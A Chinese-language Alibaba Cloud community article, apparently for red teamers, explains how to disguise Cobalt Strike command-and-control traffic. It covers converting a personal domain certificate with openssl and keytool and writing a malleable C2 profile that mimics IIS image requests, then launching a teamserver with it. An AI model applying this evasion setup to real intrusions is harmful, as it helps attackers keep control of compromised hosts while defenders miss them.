AI 助理
文档备案控制台
开发者社区 安全 文章 正文

CobaltStrike 流量隐藏

2023-11-21 282
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: CobaltStrike 流量隐藏

0x1 https流量隐藏

       前言:经过https加密后的流量虽然不是明文,但是cobaltstrike的默认证书有很多敏感文字,

               非常容易被识别。除此之外,使用默认的证书,流量也很容易被解密;

      解决:生成个人域名的证书;步骤如下:

       1. 去申请一个个人域名,推荐 https://www.namecheap.com/

       2.去给域名申请一个证书,下载证书压缩包;推荐

       3.上传证书压缩包到 cobaltstrike 目录,并解压;

       4.将证书转成 cobaltstrike.store 格式;

## 将公钥、私钥等转换格式
openssl pkcs12 -export -in {公钥文件} -inkey {私钥文件} -out {输出文件的命名} -name {证书对应的域名} -passout pass:{设置证书密码,需要记住}
openssl pkcs12 -export -in full_chain.pem -inkey private.key -out cdn.cseroadweb.xyz.p12 -name cdn.cseroadweb.xyz -passout pass:ccc123456
## 使用keytool生成 store 证书
keytool -importkeystore -deststorepass {上一步设置的密码} -destkeypass {上一步设置的密码} -destkeystore {输出文件的命名} -srckeystore {上一步输出的文件的路径} -srcstoretype PKCS12 -srcstorepass {上一步设置的密码} -alias {证书对应的域名}
keytool -importkeystore -deststorepass ccc123456 -destkeypass ccc123456 -destkeystore new.store -srckeystore cdn.cseroadweb.xyz.p12 -srcstoretype PKCS12 -srcstorepass ccc123456 -alias cdn.cseroadweb.xyz
## 生成store证书后,有1个warning,最好再对证书进行一个格式转换;new-2.store 是刚刚生成的store证书;
keytool -importkeystore -srckeystore new-2.store -destkeystore new-2.store -deststoretype pkcs12

       5.替换服务端与客户端通话的证书;

               修改teamserver,将 cobaltstrike.store 替换成我们生成的store证书;

       6.替换 web https 默认证书;

               6.1创建 profile文件,写下如下内容;

set sample_name "Etumbot";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append "-.jpg";
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
http-post {
    set uri "/history/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".asp";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
https-certificate {
    set keystore "new.store";
    set password "Testaaa@1234";
}

                6.2 验证 profile 是否可用;

                        ./c2lint profile

       7. 启动cobaltstrike 服务端;设置profile 运行 teamserver;

               ./teamserver xx.xx.xx.xx passwd profile

       

       8.验证:访问cobaltstrike 服务端口、cobaltstrike listener 端口;查看证书,看到证书已经

           替换成我们的私人证书了;            

 

 

文章标签:
域名与网站
数据安全/隐私保护
123hello123
目录
相关文章
德迅云安全杨德俊
|
云安全 安全 API
云安全中的常见云漏洞和威胁,有哪些防范措施
云安全中的常见云漏洞和威胁是多种多样的,以下是其中一些常见的类型和来源,以及相应的防范措施
德迅云安全杨德俊
1227 86
讓丄帝愛伱
|
Linux
Centos查看已经安装的软件或者包
Centos查看已经安装的软件或者包
讓丄帝愛伱
891 0
周周的奇妙编程
|
存储 安全 API
阿里云先知安全沙龙(上海站) ——红队武器开发之基于合法服务的隐蔽C2
C2(命令与控制)是攻击者远程控制受感染主机的技术。通过合法服务平台(如Slack、Telegram等)的API,攻击者可以隐蔽地传输指令和数据,避免被传统检测机制发现。合法服务具备以下优势: 1. **隐蔽性强**:流量隐藏在正常通信中,难以被检测。 2. **开发成本低**:无需自行开发服务端,减少工作量。 3. **抗封禁能力**:合法域名/IP不易被封禁,威胁情报不会标黑。 4. **团队协作**:天然支持多成员协同作战。 示例包括SaaiwC组织利用Telegram和APT29组织利用Zulip平台进行数据传输和控制。
周周的奇妙编程
1334 4
游客r65awjjoofvp6
|
安全 Java API
阿里云短信介绍和购买流程和使用流程
联网时代短信的应用无处不在,如APP的注册,平时的短信通知等。 下面就由小编系统的讲解一下阿里云短信的购买和使用流程
游客r65awjjoofvp6
952 0
hdy_coming
|
域名解析 缓存 负载均衡
CDN配置前置条件
CDN配置前置条件
hdy_coming
371 1
正禾
|
XML 安全 Java
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。
正禾
10972 1
潇湘信安
|
网络协议
MSSQL注入DNS带外问题解决
MSSQL注入DNS带外问题解决
潇湘信安
361 2
雷石安全实验室
|
JavaScript 应用服务中间件 网络安全
cobaltstrike配置nginx反向代理
cobaltstrike配置nginx反向代理
雷石安全实验室
1203 0
晓之以理的喵~~
|
监控 安全 持续交付
Docker与容器化安全:漏洞扫描和安全策略
容器化技术,特别是Docker,已经成为现代应用程序开发和部署的关键工具。然而,容器化环境也面临着安全挑战。为了保障容器环境的安全性,本文将介绍如何进行漏洞扫描、制定安全策略以及采取措施来保护Docker容器。我们将提供丰富的示例代码,以帮助大家更好地理解和应对容器安全的问题。
晓之以理的喵~~
933 0
雷石安全实验室
|
缓存 网络协议 网络安全
cobalt strike cdn上线笔记
cobalt strike cdn上线笔记
雷石安全实验室
1021 0

热门文章

最新文章

  • 1
    使用阿里云容器服务Kubernetes实现蓝绿发布功能
  • 2
    【云周刊】第161期:阿里云ET城市大脑入驻国家博物馆“复兴之路”,再获“人工智能国家队”认可
  • 3
    redis4.0之MEMORY命令详解
  • 4
    技术赋能无止境 Kubernetes Meetup 北京站完美闭幕
  • 5
    iOS 调试:通过 Safari/Chrome 调试 WebView
  • 6
    超大坑!springboot + vue + element-ui,运行前端项目报these dependencies were not found的问题
  • 7
    Hadoop配置LDAP集成Kerberos
  • 8
    RAM与ROM的区别及应用
  • 9
    Docker Hub 镜像仓库
  • 10
    csv格式文件最大行数最大列数(各个excel版本)
  • 1
    保姆级教学:OpenClaw(Clawdbot)阿里云及本地部署接入伟达免费API全指南
    346
  • 2
    阿里云1分钟或本地部署OpenClaw+AIOps高效运维实战:Prometheus+夜莺MCP,轻量化监控分析指南
    117
  • 3
    友情链接的代码 自写原创
    34
  • 4
    C++ IO流详解:标准IO、文件IO与字符串IO实战
    52
  • 5
    保姆级指南:OpenClaw阿里云及本地部署最佳实践:抓取行业调研资料+三维提效法,7天吃透陌生赛道
    100
  • 6
    [大模型实战 07] 基于 LlamaIndex ReAct 框架手搓全自动博客监控 Agent
    73
  • 7
    OpenClaw(Clawdbot)云端及本地部署保姆级教程,这些提示词skills构建“第二大脑”(智能知识数据库)
    87
  • 8
    2026年阿里云一键部署OpenClaw保姆级教程,快速拥有专属AI助理!
    60
  • 9
    突破封装之困:AI时代编程新范式——面向意图编程(Intent-Oriented Programming, IOP)
    119
  • 10
    OpenClaw 用户部署和使用指南汇总
    107

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    ECS账号安全防护最佳实践